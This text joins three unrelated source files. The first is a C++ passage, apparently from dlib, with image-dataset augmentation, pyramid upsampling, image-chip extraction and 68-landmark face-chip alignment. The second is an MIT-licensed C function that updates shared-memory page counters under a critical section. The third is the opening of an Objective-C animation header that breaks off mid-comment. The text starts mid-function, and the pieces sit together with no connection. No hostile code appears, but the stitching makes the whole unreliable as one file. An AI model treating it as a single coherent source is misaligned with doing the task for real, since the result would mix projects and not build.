flip_rect_left_right ( const rectangle& rect, const rectangle& window ) { rectangle temp; temp.top() = rect.top(); temp.bottom() = rect.bottom(); const long left_dist = rect.left()-window.left(); temp.right() = window.right()-left_dist; temp.left() = temp.right()-rect.width()+1; return temp; } inline rectangle tform_object ( const point_transform_affine& tran, const rectangle& rect ) { return centered_rect(tran(center(rect)), rect.width(), rect.height()); } inline full_object_detection tform_object( const point_transform_affine& tran, const full_object_detection& obj ) { std::vector<point> parts; parts.reserve(obj.num_parts()); for (unsigned long i = 0; i < obj.num_parts(); ++i) { parts.push_back(tran(obj.part(i))); } return full_object_detection(tform_object(tran,obj.get_rect()), parts); } } // 
----------------------------------------------------------------------------------------

    // Dataset augmentation: appends a horizontally mirrored copy of every image to
    // the dataset (doubling its size) and mirrors each image's annotations to match.
    template <
        typename image_array_type,
        typename T
        >
    void add_image_left_right_flips (
        image_array_type& images,
        std::vector<std::vector<T> >& objects
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( images.size() == objects.size(),
            "\t void add_image_left_right_flips()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t images.size(): " << images.size()
            << "\n\t objects.size(): " << objects.size()
        );

        typename image_array_type::value_type temp;
        std::vector<T> rects;

        // Only iterate over the original images; the flipped copies are appended to
        // the same array while we loop, so the bound must be captured up front.
        const unsigned long num = images.size();
        for (unsigned long j = 0; j < num; ++j)
        {
            const point_transform_affine tran = flip_image_left_right(images[j], temp);

            rects.clear();
            for (unsigned long i = 0; i < objects[j].size(); ++i)
                rects.push_back(impl::tform_object(tran, objects[j][i]));

            images.push_back(temp);
            objects.push_back(rects);
        }
    }

// ----------------------------------------------------------------------------------------

    // Same as the two argument overload but keeps a second, parallel annotation set
    // (objects2) in sync with the flipped images as well.
    template <
        typename image_array_type,
        typename T,
        typename U
        >
    void add_image_left_right_flips (
        image_array_type& images,
        std::vector<std::vector<T> >& objects,
        std::vector<std::vector<U> >& objects2
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( images.size() == objects.size() &&
                     images.size() == objects2.size(),
            "\t void add_image_left_right_flips()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t images.size(): " << images.size()
            << "\n\t objects.size(): " << objects.size()
            << "\n\t objects2.size(): " << objects2.size()
        );

        typename image_array_type::value_type temp;
        std::vector<T> rects;
        std::vector<U> rects2;

        // Capture the original size before appending the mirrored copies.
        const unsigned long num = images.size();
        for (unsigned long j = 0; j < num; ++j)
        {
            const point_transform_affine tran = flip_image_left_right(images[j], temp);
            images.push_back(temp);

            rects.clear();
            for (unsigned long i = 0; i < objects[j].size(); ++i)
                rects.push_back(impl::tform_object(tran, objects[j][i]));
            objects.push_back(rects);

            rects2.clear();
            for (unsigned long i = 0; i < objects2[j].size(); ++i)
                rects2.push_back(impl::tform_object(tran, objects2[j][i]));
            objects2.push_back(rects2);
        }
    }

// ----------------------------------------------------------------------------------------

    // Mirrors every image in place (no new images are added) and mirrors the
    // annotation rectangles so they still land on the same image content.
    template <typename image_array_type>
    void flip_image_dataset_left_right (
        image_array_type& images,
        std::vector<std::vector<rectangle> >& objects
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( images.size() == objects.size(),
            "\t void flip_image_dataset_left_right()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t images.size(): " << images.size()
            << "\n\t objects.size(): " << objects.size()
        );

        typename image_array_type::value_type temp;
        for (unsigned long i = 0; i < images.size(); ++i)
        {
            flip_image_left_right(images[i], temp);
            swap(temp,images[i]);
            for (unsigned long j = 0; j < objects[i].size(); ++j)
            {
                objects[i][j] = impl::flip_rect_left_right(objects[i][j], get_rect(images[i]));
            }
        }
    }

// ----------------------------------------------------------------------------------------

    // In-place mirror as above, additionally keeping a second annotation set in sync.
    template <typename image_array_type>
    void flip_image_dataset_left_right (
        image_array_type& images,
        std::vector<std::vector<rectangle> >& objects,
        std::vector<std::vector<rectangle> >& objects2
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( images.size() == objects.size() &&
                     images.size() == objects2.size(),
            "\t void flip_image_dataset_left_right()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t images.size(): " << images.size()
            << "\n\t objects.size(): " << objects.size()
            << "\n\t objects2.size(): " << objects2.size()
        );

        typename image_array_type::value_type temp;
        for (unsigned long i = 0; i < images.size(); ++i)
        {
            flip_image_left_right(images[i], temp);
            swap(temp, images[i]);
            for (unsigned long j = 0; j < objects[i].size(); ++j)
            {
                objects[i][j] = impl::flip_rect_left_right(objects[i][j], get_rect(images[i]));
            }
            for (unsigned long j = 0; j < objects2[i].size(); ++j)
            {
                objects2[i][j] = impl::flip_rect_left_right(objects2[i][j], get_rect(images[i]));
            }
        }
    }

// ----------------------------------------------------------------------------------------

    // Upsamples every image in place (one pyramid_up step with the given pyramid
    // type) and scales the annotation rectangles to match the larger images.
    template <
        typename pyramid_type,
        typename image_array_type
        >
    void upsample_image_dataset (
        image_array_type& images,
        std::vector<std::vector<rectangle> >& objects
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( images.size() == objects.size(),
            "\t void upsample_image_dataset()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t images.size(): " << images.size()
            << "\n\t objects.size(): " << objects.size()
        );

        typename image_array_type::value_type temp;
        pyramid_type pyr;
        for (unsigned long i = 0; i < images.size(); ++i)
        {
            pyramid_up(images[i], temp, pyr);
            swap(temp, images[i]);
            for (unsigned long j = 0; j < objects[i].size(); ++j)
            {
                objects[i][j] = pyr.rect_up(objects[i][j]);
            }
        }
    }

    // Same as above but also rescales a second, parallel annotation set.
    template <
        typename pyramid_type,
        typename image_array_type
        >
    void upsample_image_dataset (
        image_array_type& images,
        std::vector<std::vector<rectangle> >& objects,
        std::vector<std::vector<rectangle> >& objects2
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( images.size() == objects.size() &&
                     images.size() == objects2.size(),
            "\t void upsample_image_dataset()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t images.size(): " << images.size()
            << "\n\t objects.size(): " << objects.size()
            << "\n\t objects2.size(): " << objects2.size()
        );

        typename image_array_type::value_type temp;
        pyramid_type pyr;
        for (unsigned long i = 0; i < images.size(); ++i)
        {
            pyramid_up(images[i], temp, pyr);
            swap(temp, images[i]);
            for (unsigned long j = 0; j < objects[i].size(); ++j)
            {
                objects[i][j] = pyr.rect_up(objects[i][j]);
            }
            for (unsigned long j = 0; j < objects2[i].size(); ++j)
            {
                objects2[i][j] = pyr.rect_up(objects2[i][j]);
            }
        }
    }

// ----------------------------------------------------------------------------------------

    // Rotates every image in place by the given angle and recenters each annotation
    // rectangle on the rotated location of its old center (the boxes themselves stay
    // axis aligned and keep their original width/height).
    template <typename image_array_type>
    void rotate_image_dataset (
        double angle,
        image_array_type& images,
        std::vector<std::vector<rectangle> >& objects
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( images.size() == objects.size(),
            "\t void rotate_image_dataset()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t images.size(): " << images.size()
            << "\n\t objects.size(): " << objects.size()
        );

        typename image_array_type::value_type temp;
        for (unsigned long i = 0; i < images.size(); ++i)
        {
            const point_transform_affine tran = rotate_image(images[i], temp, angle);
            swap(temp, images[i]);
            for (unsigned long j = 0; j < objects[i].size(); ++j)
            {
                const rectangle rect = objects[i][j];
                objects[i][j] = centered_rect(tran(center(rect)), rect.width(), rect.height());
            }
        }
    }

    // Same as above but also updates a second, parallel annotation set.
    template <typename image_array_type>
    void rotate_image_dataset (
        double angle,
        image_array_type& images,
        std::vector<std::vector<rectangle> >& objects,
        std::vector<std::vector<rectangle> >& objects2
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( images.size() == objects.size() &&
                     images.size() == objects2.size(),
            "\t void rotate_image_dataset()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t images.size(): " << images.size()
            << "\n\t objects.size(): " << objects.size()
            << "\n\t objects2.size(): " << objects2.size()
        );

        typename image_array_type::value_type temp;
        for (unsigned long i = 0; i < images.size(); ++i)
        {
            const point_transform_affine tran = rotate_image(images[i], temp, angle);
            swap(temp, images[i]);
            for (unsigned long j = 0; j < objects[i].size(); ++j)
            {
                const rectangle rect = objects[i][j];
                objects[i][j] = centered_rect(tran(center(rect)), rect.width(), rect.height());
            }
            for (unsigned long j = 0; j < objects2[i].size(); ++j)
            {
                const rectangle rect = objects2[i][j];
                objects2[i][j] = centered_rect(tran(center(rect)), rect.width(), rect.height());
            }
        }
    }

// ----------------------------------------------------------------------------------------

    // Replaces the dataset with one rotated copy of every image per angle in
    // angles (so the output contains angles.size()*images.size() images), keeping
    // both annotation sets in sync.  Note that the originals are NOT kept unless
    // one of the angles is 0.
    template <
        typename image_array_type,
        typename EXP,
        typename T,
        typename U
        >
    void add_image_rotations (
        const matrix_exp<EXP>& angles,
        image_array_type& images,
        std::vector<std::vector<T> >& objects,
        std::vector<std::vector<U> >& objects2
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( is_vector(angles) && angles.size() > 0 &&
                     images.size() == objects.size() &&
                     images.size() == objects2.size(),
            "\t void add_image_rotations()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t is_vector(angles): " << is_vector(angles)
            << "\n\t angles.size(): " << angles.size()
            << "\n\t images.size(): " << images.size()
            << "\n\t objects.size(): " << objects.size()
            << "\n\t objects2.size(): " << objects2.size()
        );

        image_array_type new_images;
        std::vector<std::vector<T> > new_objects;
        std::vector<std::vector<U> > new_objects2;

        using namespace impl;

        std::vector<T> objtemp;
        std::vector<U> objtemp2;
        typename image_array_type::image_type temp;
        for (long i = 0; i < angles.size(); ++i)
        {
            for (unsigned long j = 0; j < images.size(); ++j)
            {
                const point_transform_affine tran = rotate_image(images[j], temp, angles(i));
                new_images.push_back(temp);

                objtemp.clear();
                for (unsigned long k = 0; k < objects[j].size(); ++k)
                    objtemp.push_back(tform_object(tran, objects[j][k]));
                new_objects.push_back(objtemp);

                objtemp2.clear();
                for (unsigned long k = 0; k < objects2[j].size(); ++k)
                    objtemp2.push_back(tform_object(tran, objects2[j][k]));
                new_objects2.push_back(objtemp2);
            }
        }

        // Swap the rotated dataset into place in one shot.
        new_images.swap(images);
        new_objects.swap(objects);
        new_objects2.swap(objects2);
    }

// ----------------------------------------------------------------------------------------

    // Convenience overload: same as above without a second annotation set.
    template <
        typename image_array_type,
        typename EXP,
        typename T
        >
    void add_image_rotations (
        const matrix_exp<EXP>& angles,
        image_array_type& images,
        std::vector<std::vector<T> >& objects
    )
    {
        // Dummy second annotation set so the main overload can be reused.
        std::vector<std::vector<T> > objects2(objects.size());
        add_image_rotations(angles, images, objects, objects2);
    }

// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------

    // Upsamples in_img by one pyramid step (e.g. 2x for pyramid_down<2>) into
    // out_img using the supplied interpolation object.
    template <
        typename image_type1,
        typename image_type2,
        typename pyramid_type,
        typename interpolation_type
        >
    void pyramid_up (
        const image_type1& in_img,
        image_type2& out_img,
        const pyramid_type& pyr,
        const interpolation_type& interp
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( is_same_object(in_img, out_img) == false,
            "\t void pyramid_up()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img)
        );

        // Empty input maps to an empty output.
        if (image_size(in_img) == 0)
        {
            set_image_size(out_img, 0, 0);
            return;
        }

        rectangle rect = get_rect(in_img);
        rectangle uprect = pyr.rect_up(rect);
        if (uprect.is_empty())
        {
            set_image_size(out_img, 0, 0);
            return;
        }
        set_image_size(out_img, uprect.bottom()+1, uprect.right()+1);

        resize_image(in_img, out_img, interp);
    }

// ----------------------------------------------------------------------------------------

    // Overload that defaults to bilinear interpolation.
    template <
        typename image_type1,
        typename image_type2,
        typename pyramid_type
        >
    void pyramid_up (
        const image_type1& in_img,
        image_type2& out_img,
        const pyramid_type& pyr
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( is_same_object(in_img, out_img) == false,
            "\t void pyramid_up()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img)
        );

        pyramid_up(in_img, out_img, pyr, interpolate_bilinear());
    }

// ----------------------------------------------------------------------------------------

    // In-place overload: upsample img by one step of pyr.
    template <
        typename image_type,
        typename pyramid_type
        >
    void pyramid_up (
        image_type& img,
        const pyramid_type& pyr
    )
    {
        image_type temp;
        pyramid_up(img, temp, pyr);
        swap(temp, img);
    }

// ----------------------------------------------------------------------------------------

    // In-place overload that defaults to a 2x upsampling.
    template <
        typename image_type
        >
    void pyramid_up (
        image_type& img
    )
    {
        pyramid_down<2> pyr;
        pyramid_up(img, pyr);
    }

// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------

    // Simple rows/cols pair describing the size of an extracted chip.
    struct chip_dims
    {
        chip_dims (
            unsigned long rows_,
            unsigned long cols_
        ) : rows(rows_), cols(cols_) { }

        unsigned long rows;
        unsigned long cols;
    };

    // Describes a sub-window ("chip") to extract from an image: the (possibly
    // non-integer) source rectangle, a rotation angle (radians), and the output
    // chip dimensions.
    struct chip_details
    {
        chip_details() : angle(0), rows(0), cols(0) {}
        chip_details(const rectangle& rect_) : rect(rect_),angle(0), rows(rect_.height()), cols(rect_.width()) {}
        chip_details(const drectangle& rect_) : rect(rect_),angle(0),
          rows((unsigned long)(rect_.height()+0.5)), cols((unsigned long)(rect_.width()+0.5)) {}
        // size is the desired total number of output pixels; the aspect ratio of
        // rect_ is preserved (see compute_dims_from_size()).
        chip_details(const drectangle& rect_, unsigned long size) : rect(rect_),angle(0)
        { compute_dims_from_size(size); }
        chip_details(const drectangle& rect_, unsigned long size, double angle_) : rect(rect_),angle(angle_)
        { compute_dims_from_size(size); }
        chip_details(const drectangle& rect_, const chip_dims& dims) :
            rect(rect_),angle(0),rows(dims.rows), cols(dims.cols) {}
        chip_details(const drectangle& rect_, const chip_dims& dims, double angle_) :
            rect(rect_),angle(angle_),rows(dims.rows), cols(dims.cols) {}

        // Builds a chip description from point correspondences: chip_points are
        // locations inside the (dims sized) chip and img_points are where they
        // should map to in the source image.  A similarity transform between the
        // two point sets determines the extraction rectangle and rotation angle.
        template <typename T>
        chip_details(
            const std::vector<dlib::vector<T,2> >& chip_points,
            const std::vector<dlib::vector<T,2> >& img_points,
            const chip_dims& dims
        ) : rows(dims.rows), cols(dims.cols)
        {
            DLIB_CASSERT( chip_points.size() == img_points.size() && chip_points.size() >= 2,
                "\t chip_details::chip_details(chip_points,img_points,dims)"
                << "\n\t Invalid inputs were given to this function."
                << "\n\t chip_points.size(): " << chip_points.size()
                << "\n\t img_points.size(): " << img_points.size()
            );

            const point_transform_affine tform = find_similarity_transform(chip_points,img_points);
            dlib::vector<double,2> p(1,0);
            p = tform.get_m()*p;

            // There are only 3 things happening in a similarity transform. There is a
            // rescaling, a rotation, and a translation. So here we pick out the scale and
            // rotation parameters.
            angle = std::atan2(p.y(),p.x());
            // Note that the translation and scale part are represented by the extraction
            // rectangle. So here we build the appropriate rectangle.
            const double scale = length(p);
            rect = centered_drect(tform(point(dims.cols,dims.rows)/2.0),
                                  dims.cols*scale,
                                  dims.rows*scale);
        }

        drectangle rect;     // extraction rectangle in the source image
        double angle;        // rotation applied during extraction, in radians
        unsigned long rows;  // output chip height
        unsigned long cols;  // output chip width

        // Total number of pixels in the output chip.
        inline unsigned long size() const { return rows*cols; }

    private:
        // Picks rows/cols so that rows*cols ~= size while preserving the aspect
        // ratio of rect; both dimensions are clamped to at least 1.
        void compute_dims_from_size (
            unsigned long size
        )
        {
            const double relative_size = std::sqrt(size/(double)rect.area());
            rows = static_cast<unsigned long>(rect.height()*relative_size + 0.5);
            cols = static_cast<unsigned long>(size/(double)rows + 0.5);
            rows = std::max(1ul,rows);
            cols = std::max(1ul,cols);
        }
    };

// ----------------------------------------------------------------------------------------

    // Returns the affine transform that maps points in the source image (inside the
    // possibly rotated extraction rectangle) to points inside the extracted chip.
    inline point_transform_affine get_mapping_to_chip (
        const chip_details& details
    )
    {
        std::vector<dlib::vector<double,2> > from, to;
        // Three corner correspondences fully determine the affine map.
        point p1(0,0);
        point p2(details.cols-1,0);
        point p3(details.cols-1, details.rows-1);
        to.push_back(p1);
        from.push_back(rotate_point<double>(center(details.rect),details.rect.tl_corner(),details.angle));
        to.push_back(p2);
        from.push_back(rotate_point<double>(center(details.rect),details.rect.tr_corner(),details.angle));
        to.push_back(p3);
        from.push_back(rotate_point<double>(center(details.rect),details.rect.br_corner(),details.angle));
        return find_affine_transform(from, to);
    }

// ----------------------------------------------------------------------------------------

    // Maps a detection (its rectangle and all its parts) from source image
    // coordinates into the coordinate system of the chip described by details.
    inline full_object_detection map_det_to_chip(
        const full_object_detection& det,
        const chip_details& details
    )
    {
        point_transform_affine tform = get_mapping_to_chip(details);
        full_object_detection res(det);
        // map the parts
        for (unsigned long l = 0; l < det.num_parts(); ++l)
            res.part(l) = tform(det.part(l));
        // map the main rectangle; take the bounding box of all four mapped corners
        // since the transform can rotate the rectangle.
        rectangle rect;
        rect += tform(det.get_rect().tl_corner());
        rect += tform(det.get_rect().tr_corner());
        rect += tform(det.get_rect().bl_corner());
        rect += tform(det.get_rect().br_corner());
        res.get_rect() = rect;
        return res;
    }

// ----------------------------------------------------------------------------------------

    namespace impl
    {
        template <
            typename image_type1,
            typename image_type2
            >
        void basic_extract_image_chip (
            const image_type1& img,
            const rectangle& location,
            image_type2& chip
        )
        /*!
            ensures
                - This function doesn't do any scaling or rotating. It just pulls out the
                  chip in the given rectangle. This also means the output image has the
                  same dimensions as the location rectangle.
        !*/
        {
            const_image_view<image_type1> vimg(img);
            image_view<image_type2> vchip(chip);

            vchip.set_size(location.height(), location.width());

            // location might go outside img so clip it
            rectangle area = location.intersect(get_rect(img));

            // find the part of the chip that corresponds to area in img.
            rectangle chip_area = translate_rect(area, -location.tl_corner());

            // Anything outside the source image becomes zero in the chip.
            zero_border_pixels(chip, chip_area);
            // now pull out the contents of area/chip_area.
            for (long r = chip_area.top(), rr = area.top(); r <= chip_area.bottom(); ++r,++rr)
            {
                for (long c = chip_area.left(), cc = area.left(); c <= chip_area.right(); ++c,++cc)
                {
                    assign_pixel(vchip[r][c], vimg[rr][cc]);
                }
            }
        }
    }

// ----------------------------------------------------------------------------------------

    // Extracts all the requested chips from img.  Down-scaling is done through an
    // image pyramid (rather than one bilinear resample) so heavily shrunk chips
    // keep good quality.
    template <
        typename image_type1,
        typename image_type2
        >
    void extract_image_chips (
        const image_type1& img,
        const std::vector<chip_details>& chip_locations,
        dlib::array<image_type2>& chips
    )
    {
        // make sure requires clause is not broken
#ifdef ENABLE_ASSERTS
        for (unsigned long i = 0; i < chip_locations.size(); ++i)
        {
            DLIB_CASSERT(chip_locations[i].size() != 0 &&
                         chip_locations[i].rect.is_empty() == false,
                "\t void extract_image_chips()"
                << "\n\t Invalid inputs were given to this function."
                << "\n\t chip_locations["<<i<<"].size(): " << chip_locations[i].size()
                << "\n\t chip_locations["<<i<<"].rect.is_empty(): " << chip_locations[i].rect.is_empty()
            );
        }
#endif

        pyramid_down<2> pyr;
        long max_depth = 0;
        // If the chip is supposed to be much smaller than the source subwindow then you
        // can't just extract it using bilinear interpolation since at a high enough
        // downsampling amount it would effectively turn into nearest neighbor
        // interpolation. So we use an image pyramid to make sure the interpolation is
        // fast but also high quality. The first thing we do is figure out how deep the
        // image pyramid needs to be.
        rectangle bounding_box;
        for (unsigned long i = 0; i < chip_locations.size(); ++i)
        {
            long depth = 0;
            double grow = 2;
            drectangle rect = pyr.rect_down(chip_locations[i].rect);
            while (rect.area() > chip_locations[i].size())
            {
                rect = pyr.rect_down(rect);
                ++depth;
                // We drop the image size by a factor of 2 each iteration and then assume a
                // border of 2 pixels is needed to avoid any border effects of the crop.
                grow = grow*2 + 2;
            }

            // Bounding box of the (possibly rotated) extraction rectangle.
            drectangle rot_rect;
            const vector<double,2> cent = center(chip_locations[i].rect);
            rot_rect += rotate_point<double>(cent,chip_locations[i].rect.tl_corner(),chip_locations[i].angle);
            rot_rect += rotate_point<double>(cent,chip_locations[i].rect.tr_corner(),chip_locations[i].angle);
            rot_rect += rotate_point<double>(cent,chip_locations[i].rect.bl_corner(),chip_locations[i].angle);
            rot_rect += rotate_point<double>(cent,chip_locations[i].rect.br_corner(),chip_locations[i].angle);
            bounding_box += grow_rect(rot_rect, grow).intersect(get_rect(img));
            max_depth = std::max(depth,max_depth);
        }
        //std::cout << "max_depth: " << max_depth << std::endl;
        //std::cout << "crop amount: " << bounding_box.area()/(double)get_rect(img).area() << std::endl;

        // now make an image pyramid
        dlib::array<array2d<typename image_traits<image_type1>::pixel_type> > levels(max_depth);
        if (levels.size() != 0)
            pyr(sub_image(img,bounding_box),levels[0]);
        for (unsigned long i = 1; i < levels.size(); ++i)
            pyr(levels[i-1],levels[i]);

        std::vector<dlib::vector<double,2> > from, to;

        // now pull out the chips
        chips.resize(chip_locations.size());
        for (unsigned long i = 0; i < chips.size(); ++i)
        {
            // If the chip doesn't have any rotation or scaling then use the basic version
            // of chip extraction that just does a fast copy.
            if (chip_locations[i].angle == 0 &&
                chip_locations[i].rows == chip_locations[i].rect.height() &&
                chip_locations[i].cols == chip_locations[i].rect.width())
            {
                impl::basic_extract_image_chip(img, chip_locations[i].rect, chips[i]);
            }
            else
            {
                set_image_size(chips[i], chip_locations[i].rows, chip_locations[i].cols);

                // figure out which level in the pyramid to use to extract the chip
                // (level == -1 means sample straight from the cropped input).
                int level = -1;
                drectangle rect = translate_rect(chip_locations[i].rect, -bounding_box.tl_corner());
                while (pyr.rect_down(rect).area() > chip_locations[i].size())
                {
                    ++level;
                    rect = pyr.rect_down(rect);
                }

                // find the appropriate transformation that maps from the chip to the input
                // image
                from.clear();
                to.clear();
                from.push_back(get_rect(chips[i]).tl_corner());
                to.push_back(rotate_point<double>(center(rect),rect.tl_corner(),chip_locations[i].angle));
                from.push_back(get_rect(chips[i]).tr_corner());
                to.push_back(rotate_point<double>(center(rect),rect.tr_corner(),chip_locations[i].angle));
                from.push_back(get_rect(chips[i]).bl_corner());
                to.push_back(rotate_point<double>(center(rect),rect.bl_corner(),chip_locations[i].angle));
                point_transform_affine trns = find_affine_transform(from,to);

                // now extract the actual chip
                if (level == -1)
                    transform_image(sub_image(img,bounding_box),chips[i],interpolate_bilinear(),trns);
                else
                    transform_image(levels[level],chips[i],interpolate_bilinear(),trns);
            }
        }
    }

// ----------------------------------------------------------------------------------------

    // Single-chip convenience wrapper around extract_image_chips().
    template <
        typename image_type1,
        typename image_type2
        >
    void extract_image_chip (
        const image_type1& img,
        const chip_details& location,
        image_type2& chip
    )
    {
        // If the chip doesn't have any rotation or scaling then use the basic version of
        // chip extraction that just does a fast copy.
        if (location.angle == 0 &&
            location.rows == location.rect.height() &&
            location.cols == location.rect.width())
        {
            impl::basic_extract_image_chip(img, location.rect, chip);
        }
        else
        {
            std::vector<chip_details> chip_locations(1,location);
            dlib::array<image_type2> chips;
            extract_image_chips(img, chip_locations, chips);
            swap(chips[0], chip);
        }
    }

// ----------------------------------------------------------------------------------------

    // Builds a chip_details describing a size x size aligned face crop from a
    // 68-part facial landmark detection, by fitting a similarity transform from a
    // mean face shape to the detected landmarks.  padding is the fraction of extra
    // border around the face (0.2 adds 20% on each side).
    inline chip_details get_face_chip_details (
        const full_object_detection& det,
        const unsigned long size = 200,
        const double padding = 0.2
    )
    {
        DLIB_CASSERT(det.num_parts() == 68,
            "\t chip_details get_face_chip_details()"
            << "\n\t You must give a detection with exactly 68 parts in it."
            << "\n\t det.num_parts(): " << det.num_parts()
        );
        DLIB_CASSERT(padding >= 0 && size > 0,
            "\t chip_details get_face_chip_details()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t padding: " << padding
            << "\n\t size: " << size
        );

        // Average positions of face points 17-67
        const double mean_face_shape_x[] = {
            0.000213256, 0.0752622, 0.18113, 0.29077, 0.393397, 0.586856, 0.689483, 0.799124,
            0.904991, 0.98004, 0.490127, 0.490127, 0.490127, 0.490127, 0.36688, 0.426036,
            0.490127, 0.554217, 0.613373, 0.121737, 0.187122, 0.265825, 0.334606, 0.260918,
            0.182743, 0.645647, 0.714428, 0.793132, 0.858516, 0.79751, 0.719335, 0.254149,
            0.340985, 0.428858, 0.490127, 0.551395, 0.639268, 0.726104, 0.642159, 0.556721,
            0.490127, 0.423532, 0.338094, 0.290379, 0.428096, 0.490127, 0.552157, 0.689874,
            0.553364, 0.490127, 0.42689
        };
        const double mean_face_shape_y[] = {
            0.106454, 0.038915, 0.0187482, 0.0344891, 0.0773906, 0.0773906, 0.0344891,
            0.0187482, 0.038915, 0.106454, 0.203352, 0.307009, 0.409805, 0.515625, 0.587326,
            0.609345, 0.628106, 0.609345, 0.587326, 0.216423, 0.178758, 0.179852, 0.231733,
            0.245099, 0.244077, 0.231733, 0.179852, 0.178758, 0.216423, 0.244077, 0.245099,
            0.780233, 0.745405, 0.727388, 0.742578, 0.727388, 0.745405, 0.780233, 0.864805,
            0.902192, 0.909281, 0.902192, 0.864805, 0.784792, 0.778746, 0.785343, 0.778746,
            0.784792, 0.824182, 0.831803, 0.824182
        };
        COMPILE_TIME_ASSERT(sizeof(mean_face_shape_x)/sizeof(double) == 68-17);

        std::vector<dlib::vector<double,2> > from_points, to_points;
        for (unsigned long i = 17; i < det.num_parts(); ++i)
        {
            // Ignore the lower lip
            if ((55 <= i && i <= 59) || (65 <= i && i <= 67))
                continue;
            // Ignore the eyebrows
            if (17 <= i && i <= 26)
                continue;

            dlib::vector<double,2> p;
            p.x() = (padding+mean_face_shape_x[i-17])/(2*padding+1);
            p.y() = (padding+mean_face_shape_y[i-17])/(2*padding+1);
            from_points.push_back(p*size);
            to_points.push_back(det.part(i));
        }

        return chip_details(from_points, to_points, chip_dims(size,size));
    }

// ----------------------------------------------------------------------------------------

    // Vector version of get_face_chip_details(): one chip description per detection.
    inline std::vector<chip_details> get_face_chip_details (
        const std::vector<full_object_detection>& dets,
        const unsigned long size = 200,
        const double padding = 0.2
    )
    {
        std::vector<chip_details> res;
        res.reserve(dets.size());
        for (unsigned long i = 0; i < dets.size(); ++i)
            res.push_back(get_face_chip_details(dets[i], size, padding));
        return res;
    }

// ----------------------------------------------------------------------------------------

}

#endif // DLIB_INTERPOlATIONh_
/*
Copyright (c) 2015,2016 Jeremy Iverson

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/


#ifndef _GNU_SOURCE
# define _GNU_SOURCE 1
#endif

#include <stddef.h> /* size_t */

#include "common.h"
#include "ipc.h"
#include "sbma.h"


/*****************************************************************************/
/*  MP-Unsafe race:rw(ipc->s_mem,ipc->c_mem[ipc->id])                        */
/*            race:wr(ipc->d_mem[ipc->id])                                   */
/*  MT-Unsafe race:rw(ipc->s_mem,ipc->c_mem[ipc->id])                        */
/*                                                                           */
/*  Note:                                                                    */
/*  1) Only other threads from this process will ever modify                 */
/*     ipc->d_mem[ipc->id], so the IPC_INTRA_CRITICAL_SECTION is             */
/*     sufficient to make that variable MT-Safe.                             */
/*                                                                           */
/*  Mitigation:                                                              */
/*  1) Call from within an IPC_INTER_CRITICAL_SECTION or call after          */
/*     receiving SIGIPC from a process in an IPC_INTER_CRITICAL_SECTION.     */
/*  2) Functions that READ ipc->d_mem[ipc->id] from a different process      */
/*     SHOULD be aware of the possibility of reading a stale value.
 */
/*****************************************************************************/
/* Returns c_pages of this process's charged commit back to the shared pool  */
/* (s_mem) and drops d_pages from its dirty-page count.  See the safety      */
/* notes in the comment block above for the required calling context.       */
SBMA_EXTERN void
ipc_atomic_dec(struct ipc * const ipc, size_t const c_pages,
               size_t const d_pages)
{
  /*=========================================================================*/
  IPC_INTRA_CRITICAL_SECTION_BEG(ipc);
  /*=========================================================================*/

  /* A process can never release more pages than it currently has charged. */
  ASSERT(ipc->c_mem[ipc->id] >= c_pages);
  ASSERT(ipc->d_mem[ipc->id] >= d_pages);

  /* Move the charged pages back into the shared free counter and update     */
  /* this process's per-id charged and dirty counters.                       */
  *ipc->s_mem += c_pages;
  ipc->c_mem[ipc->id] -= c_pages;
  ipc->d_mem[ipc->id] -= d_pages;

  /*=========================================================================*/
  IPC_INTRA_CRITICAL_SECTION_END(ipc);
  /*=========================================================================*/
}


#ifdef TEST
/* Minimal smoke-test entry point; the argc/argv check only silences unused-
 * parameter warnings. */
int
main(int argc, char * argv[])
{
  if (0 == argc || NULL == argv) {}

  return 0;
}
#endif
//
//  FNFullImageAnimation.h
//  FNMarket
//
//  Created by fuyong on 15/5/7.
//  Copyright (c) 2015 cn.com.feiniu. All rights reserved.
//

#import <UIKit/UIKit.h>
#import "FNBaseAnimatedTransitioning.h"

// Animated transition for presenting an image full screen.  Only the
